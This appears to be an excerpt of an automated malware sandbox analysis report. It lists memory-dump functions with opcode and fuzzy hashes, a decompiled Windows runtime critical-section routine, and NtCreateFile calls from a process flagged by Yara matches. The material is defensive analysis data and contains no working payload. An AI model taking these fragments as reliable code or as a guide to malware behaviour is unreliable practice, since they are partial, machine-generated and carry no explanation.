Uniqueness

Uniqueness Score: -1.00%

Function 011EA185, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d89467ec74d146d1ffa66d9235028f0e0a4e73dfc3f6ecce46899e0029eb81
Instruction ID: f7ea67db0ca6ce1a7fc1a1889261d0b9bdfe24acbf87b3b4d71bf71d7efe3cc7
Opcode Fuzzy Hash: 67d89467ec74d146d1ffa66d9235028f0e0a4e73dfc3f6ecce46899e0029eb81
Instruction Fuzzy Hash: 5CD02E621308006BC62D2380AC3CB253A92FB847A4FBE480CF2034F9E0EB60C8D48209

Uniqueness

Uniqueness Score: -1.00%

Function 011E16E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebce553478721476df831e2b9ad5968271e2b99433b1553229f973f59ab81253
Instruction ID: 8bba34f6544d7e134d7c65664fbb19263be8fd614cde044174b86e3890ac5018
Opcode Fuzzy Hash: ebce553478721476df831e2b9ad5968271e2b99433b1553229f973f59ab81253
Instruction Fuzzy Hash: 3BD0A731250901B2EA2D5F549C48B1426D2EB98B85F78005CF207498D0CFF0CCD2E848

Uniqueness

Uniqueness Score: -1.00%

Function 012353CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 470662b179b789d28f91fa3b3fc2d5851c29fc7ab6ea903a4e3609dfd3476826
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: E4E08C729507819BCF16DB48C650F5EBBF5FB84B00F190408A1085B660C734AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 011CAAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 6565e7d5dc1bd6594d5a724ff5ed32a3ae81adab1673e20862e8f831cb840eb8
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 93D0C935352980CFD61BCB0CC554B0633A4FF04B44FC50490E500CB722E72CD940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 011E35A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: c04d8ac9d45b2652ec986307f91fd5511e1460b55f922b2b00ae90d1866b402a
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 3AD0A9314629819AEB0EAB94C21C7783BF2BF00308F582069801307A52C33A4A0ACE01

Uniqueness

Uniqueness Score: -1.00%

Function 011BDB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 2e3fea06df5885a039e224b18c12f90bc803a81fa84358cc421993a26a04bddf
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: DEC08C30280A01AAEB2A1F20CE81B403AA0BB11B09F8400A0A301DA8F0DB78D801E600

Uniqueness

Uniqueness Score: -1.00%

Function 0123A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 4c3eda3b8157ca5d0da8fb9e418998bfd3c5e3a455c6b9d833b912344563d86b
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: A9C08C33080248BBCB126F81CC00F467F2AFBA4B60F008010FA080B570C632E970EB84

Uniqueness

Uniqueness Score: -1.00%

Function 011D3A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 18fdd8e8c90108538a968798adbe5b7979e37f22efa5a62f3adca7eebcb61633
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: C2C08C32080248BBC7126E41DC40F017B29E7A0B60F000020B6040A9608632EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 011BAD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 1ffd548789d86df60006a1b9453360901983dd2a5d51ac0f56263052b3e7cae2
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: CCC02B330C0648BBC7126F45CD00F01BF2DE7A0B60F010020F6040B6B1CA32EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 011E36CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 74cf6cc04fb4aa220dfe420afe2714f8590c858fb5f20a889f58e2a107b76a20
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 2CC02B70160840FBD71D1F30CD80F147294F700A21F640354723146CF0D7389D00D500

Uniqueness

Uniqueness Score: -1.00%

Function 011C76E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 763d3f9bd97421dbc83defafae399cfc63c7d9e1cf5d0f5170317aa7d0b56a7c
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 03C08C711415805AFB2E570CCE26B283A50AB28B0CFC8019CEA01094E2C3A8A802CA08

Uniqueness

Uniqueness Score: -1.00%

Function 011D7D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 0910bddeac083dd1cc3d141e8f8f760dbe6d5aa4d137c1866716143a982fb76d
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 5AB092353019408FCE1ADF18C080B1933E4BB45A44B8400D4E400CBA21D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 011E2ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 6df0640e60757bd2e5102f6e75000f8307e079b4396155ee2cd1ac5d08d5d9a9
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 89B01232C51441CFCF06EF40C610B297731FB10B50F094494900127930C328AC01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011F9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c010639965ba89ccf4d6ab859b485e883e67d0cf255c642d03e98bfc15762d67
Instruction ID: a91d85b677013b937a1c1e9b3230402a7f133f8a735dab4a7e95c0481544b102
Opcode Fuzzy Hash: c010639965ba89ccf4d6ab859b485e883e67d0cf255c642d03e98bfc15762d67
Instruction Fuzzy Hash: 4F9002A121240803D24165E948046070005A7D0342F51C111A2054559FCAA98C517275

Uniqueness

Uniqueness Score: -1.00%

Function 011F99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd0b199dc4752aad507adba28717defde3d5b0a2292a461c00063e5c397eb74
Instruction ID: 1f244f2bb79157389f7c4f8214ec0ab0d70089671650e34ad20684a47c0970f6
Opcode Fuzzy Hash: cbd0b199dc4752aad507adba28717defde3d5b0a2292a461c00063e5c397eb74
Instruction Fuzzy Hash: B79002A122200442D20561E944047060045A7E1241F51C112A2144558DC5A98C616265

Uniqueness

Uniqueness Score: -1.00%

Function 011F9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d6dd0bedd169ffc34b6d1f41d8785027b37c8e372c5196b1f33bbc619aa6b6
Instruction ID: 34b66a795b109f6b7d0b31fc3c810d68f5eeba0c61a8b61b39b2ce6ee0d9c7dc
Opcode Fuzzy Hash: c4d6dd0bedd169ffc34b6d1f41d8785027b37c8e372c5196b1f33bbc619aa6b6
Instruction Fuzzy Hash: 7190027125200802D24271E944046060009B7D0281F91C112A0414558FC6D58A56BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 011FB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf845008721411ee8362f6c8983cf65b04231720ff784ae9aed3168d7b607a04
Instruction ID: d3c43a3442814b46b9da8ad3840b74955ffc7d6519ccc393e76b5e6e81133f35
Opcode Fuzzy Hash: bf845008721411ee8362f6c8983cf65b04231720ff784ae9aed3168d7b607a04
Instruction Fuzzy Hash: 9B9002A1612144434641B1E948044065015B7E1341391C221A0444564DC6E88855A3A5

Uniqueness

Uniqueness Score: -1.00%

Function 011F98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637d10860ce7af8baf5b5d511f16d6bd76060c9ee7e534ae4264bfb828075b89
Instruction ID: 7619089af34b3d48731371423a0415100e1e035145185f57ee34d66d90329b08
Opcode Fuzzy Hash: 637d10860ce7af8baf5b5d511f16d6bd76060c9ee7e534ae4264bfb828075b89
Instruction Fuzzy Hash: 9390026131200802D20361E944146060009E7D1385F91C112E1414559EC6A58953B272

Uniqueness

Uniqueness Score: -1.00%

Function 011F9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af549c6ada4b79bd9edbdbb40e600bb83fcf4cf52a041c3657ab0e784e42dfc4
Instruction ID: d1ccbb055ede2d6dbffa9f2b868c128a1b6ec805f8b322dbf8a253e20512d4f3
Opcode Fuzzy Hash: af549c6ada4b79bd9edbdbb40e600bb83fcf4cf52a041c3657ab0e784e42dfc4
Instruction Fuzzy Hash: E790026125200C02D24171E984147070006E7D0641F51C111A0014558EC696896577F1

Uniqueness

Uniqueness Score: -1.00%

Function 011FA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fe11fe97159c9e28c5ed2226bbe5efb7a301e9fa37b1179d8108ac857701ec
Instruction ID: dd6e3d2fd97e50e36d0f6735de5afc2b30514758e74aadf05ee5af0723e7a12c
Opcode Fuzzy Hash: 41fe11fe97159c9e28c5ed2226bbe5efb7a301e9fa37b1179d8108ac857701ec
Instruction Fuzzy Hash: E290027121244402D24171E9844460B5005B7E0341F51C511E0415558DC6958856A361

Uniqueness

Uniqueness Score: -1.00%

Function 011F9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17228241ace65138f1a6f741fb12fa074077a823640cdf7e3e3aa3dee60b1a95
Instruction ID: 2118dd5958b793406f974cd80ddce9d3b5e9f72c834d94282b53abbf469a35e7
Opcode Fuzzy Hash: 17228241ace65138f1a6f741fb12fa074077a823640cdf7e3e3aa3dee60b1a95
Instruction Fuzzy Hash: 5790027121240802D20161E948087470005A7D0342F51C111A5154559FC6E5C8917671

Uniqueness

Uniqueness Score: -1.00%

Function 011F9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2e2cd00e7f78a8a70e8cacdc408440bc4d753cc463e4e7bd98b01547d432e8
Instruction ID: 6ec8c351679e43acc52e9025977f4b1baad11551470f72f086c5823e525c2c8c
Opcode Fuzzy Hash: de2e2cd00e7f78a8a70e8cacdc408440bc4d753cc463e4e7bd98b01547d432e8
Instruction Fuzzy Hash: 2990026121244842D24162E94804B0F4105A7E1242F91C119A4146558DC99588556761

Uniqueness

Uniqueness Score: -1.00%

Function 011FAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a012dd2ad8f8688f24ad72f0040aae5adff9cd70f5c12bd321d78f1655e316
Instruction ID: e26a3d6c434def3d72fa013602d43dc83a5cf5dbfebb48ee2883d7b349494682
Opcode Fuzzy Hash: 77a012dd2ad8f8688f24ad72f0040aae5adff9cd70f5c12bd321d78f1655e316
Instruction Fuzzy Hash: ED900271A1600412924171E948146464006B7E0781B55C111A0504558DC9D48A5563E1

Uniqueness

Uniqueness Score: -1.00%

Function 011F9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c2322033a6714a1cc70ddda50f3e9591313bcdee944bad6cbf311b33e137b8
Instruction ID: 75b409d44ea933926d0ffcd97109725b1c852cf1694dbeab294712793beb37e5
Opcode Fuzzy Hash: 99c2322033a6714a1cc70ddda50f3e9591313bcdee944bad6cbf311b33e137b8
Instruction Fuzzy Hash: 199002E1212144924601A2E98404B0A4505A7E0241B51C116E1044564DC5A58851A275

Uniqueness

Uniqueness Score: -1.00%

Function 011F9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21585a85154d1db2a8f700762908c0f0e7cef82e5c3b5f54c3c24ebf9fdc5b48
Instruction ID: fc94c86833266e8550b94c15e619f9d655619dd2baa7b178d15e7f6c87deefb0
Opcode Fuzzy Hash: 21585a85154d1db2a8f700762908c0f0e7cef82e5c3b5f54c3c24ebf9fdc5b48
Instruction Fuzzy Hash: 1C900265232004020246A5E9060450B0445B7D6391391C115F1406594DC6A188656361

Uniqueness

Uniqueness Score: -1.00%

Function 011F95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bb7899b1f3957edb9746da72ac2cc11f8f9f0c62f4a4dce94ed9956448b633
Instruction ID: 0e5ec52bfd1af58c88e4bedfda97d5994d7de12a745393baa9f0942e79a36e36
Opcode Fuzzy Hash: b8bb7899b1f3957edb9746da72ac2cc11f8f9f0c62f4a4dce94ed9956448b633
Instruction Fuzzy Hash: 7C90027121200C02D20561E948046860005A7D0341F51C111A6014659FD6E588917271

Uniqueness

Uniqueness Score: -1.00%

Function 011FA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e4d7c98b00514123eeea6dcca086dcbfe8a6efd4275dd30eb7b4a89e9ef180
Instruction ID: e73ba4646342da9288615c6c01cce6c9fd33d279f703c954eefd6b24965eba11
Opcode Fuzzy Hash: 60e4d7c98b00514123eeea6dcca086dcbfe8a6efd4275dd30eb7b4a89e9ef180
Instruction Fuzzy Hash: 31900271312004529601A6E95804A4A4105A7F0341B51D115A4004558DC5D488616261

Uniqueness

Uniqueness Score: -1.00%

Function 011F9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6148f4ee165c11c5f64b628288d27b62730991ecfc62896ccf0907a55248ea5b
Instruction ID: e036a28e92121ace590c544b298a0183c86d6f2bd6fee139d475fc141f2d54ac
Opcode Fuzzy Hash: 6148f4ee165c11c5f64b628288d27b62730991ecfc62896ccf0907a55248ea5b
Instruction Fuzzy Hash: 2390026161600802D24171E954187060015A7D0241F51D111A0014558EC6D98A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 011FA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad660e6209fe0b1473945074c8fb440fd01ce7809275fda73210e04ec2a5c5f
Instruction ID: ce2c0d800d732885075f2655243025443ba17c8763f6b45b71a614eabbf361ae
Opcode Fuzzy Hash: cad660e6209fe0b1473945074c8fb440fd01ce7809275fda73210e04ec2a5c5f
Instruction Fuzzy Hash: 4B90027521604842D60165E95804A870005A7D0345F51D511A041459CEC6D48861B261

Uniqueness

Uniqueness Score: -1.00%

Function 011F9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a02eb37246a036df6b34551f14a528471eadf038cc5c2d8b5ad259c3f97c45
Instruction ID: 2e249176d5fcae4b5c37865aa2c3b44150b7a8e156601d53b013ccb50e4cb3dc
Opcode Fuzzy Hash: b2a02eb37246a036df6b34551f14a528471eadf038cc5c2d8b5ad259c3f97c45
Instruction Fuzzy Hash: 3B90026121604842D20165E95408A060005A7D0245F51D111A1054599EC6B58851B271

Uniqueness

Uniqueness Score: -1.00%

Function 011F9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d1ac3195ebeca4e1d7846047d58a12766e35c6fe24cc36efa7cb691ba0b770
Instruction ID: bb119c6366b7c21a984f833b8cc86c50289e6fcb660737fcec8001a41a74071f
Opcode Fuzzy Hash: c9d1ac3195ebeca4e1d7846047d58a12766e35c6fe24cc36efa7cb691ba0b770
Instruction Fuzzy Hash: 8E90027121200803D20161E955087070005A7D0241F51D511A041455CED6D688517261

Uniqueness

Uniqueness Score: -1.00%

Function 011F9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f95e5b1cdf135d4c9328e7b9108a98da63e6dae488a9a51f709e5048fcfd5ee
Instruction ID: fc53e0fc4c0a99db4d717d17efb2ea66c962fa9276c0ce56d89154c68aed139b
Opcode Fuzzy Hash: 8f95e5b1cdf135d4c9328e7b9108a98da63e6dae488a9a51f709e5048fcfd5ee
Instruction Fuzzy Hash: 4490027161600C02D25171E944147460005A7D0341F51C111A0014658EC7D58A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 011F9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722668a59f5b7a43694b184351e9b081b05b12776deea6c4e502bfe8aeb184d2
Instruction ID: 093694d2740061feb89a69decd43a083d90e2cceab536dbd6fbd435be700f184
Opcode Fuzzy Hash: 722668a59f5b7a43694b184351e9b081b05b12776deea6c4e502bfe8aeb184d2
Instruction Fuzzy Hash: 1690027121604C42D24171E94404A460015A7D0345F51C111A0054698ED6A58D55B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 011F96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce8a303657d72a819cfe031c8ead40250cb629a5b53d879213a31be018fb729
Instruction ID: 83506dccf0df5d5a3ef652091e95a80fbb56cae3b081bef9c1e765cf439c3865
Opcode Fuzzy Hash: dce8a303657d72a819cfe031c8ead40250cb629a5b53d879213a31be018fb729
Instruction Fuzzy Hash: 3490027121200C42D20161E94404B460005A7E0341F51C116A0114658EC695C8517661

Uniqueness

Uniqueness Score: -1.00%

Function 011F9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 21dd757bfc7974d86c490018f33deb06f16bf7284309ef2c1ec8343648a45764
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0124FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0124FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E011FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01245720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01245720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0124fdda
0x0124fde2
0x0124fde5
0x0124fdec
0x0124fdfa
0x0124fdff
0x0124fe0a
0x0124fe0f
0x0124fe17
0x0124fe1e
0x0124fe19
0x0124fe19
0x0124fe19
0x0124fe20
0x0124fe21
0x0124fe22
0x0124fe25
0x0124fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0124FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0124FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0124FE2B

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 214f3f0430efcfd0317159a5b744d1f94a4e528cf073e23f011ccf0777bdb01d
Instruction ID: b1027dc5b22659fc4bd813ffe203218ce684d9c8b48a7701dd6dcd7522a8458c
Opcode Fuzzy Hash: 214f3f0430efcfd0317159a5b744d1f94a4e528cf073e23f011ccf0777bdb01d
Instruction Fuzzy Hash: 1EF0F636250202BFE72C1A49DD02F33BF5AEB84B30F140318F7685A5D1DA62F82096F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmmon32.exe PID: 5328 Parent PID: 3424 cmmon32.exeCOMMON

Executed Functions

Function 02D385DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3862D

Strings

.z`, xrefs: 02D3861D, 02D38628

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 97b105db36ad954c15dd7d14958838aa0674954f2ef9e9fecbb65e7fd23e2661
Instruction ID: 2d4bc69bd6c15404284eb4eba61c68b8fdd8e58fe17c70476e716432f582e02c
Opcode Fuzzy Hash: 97b105db36ad954c15dd7d14958838aa0674954f2ef9e9fecbb65e7fd23e2661
Instruction Fuzzy Hash: E301B2B2245108AFCB18CF98DC95EEB77ADAF8C754F158248FA0DD7240D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D385E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3862D

Strings

.z`, xrefs: 02D3861D, 02D38628

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 62f6a2e3c4403a8fac820fbc2b52815b971d1668d507044b050e431b07673748
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: E7F0B2B2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D3868A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

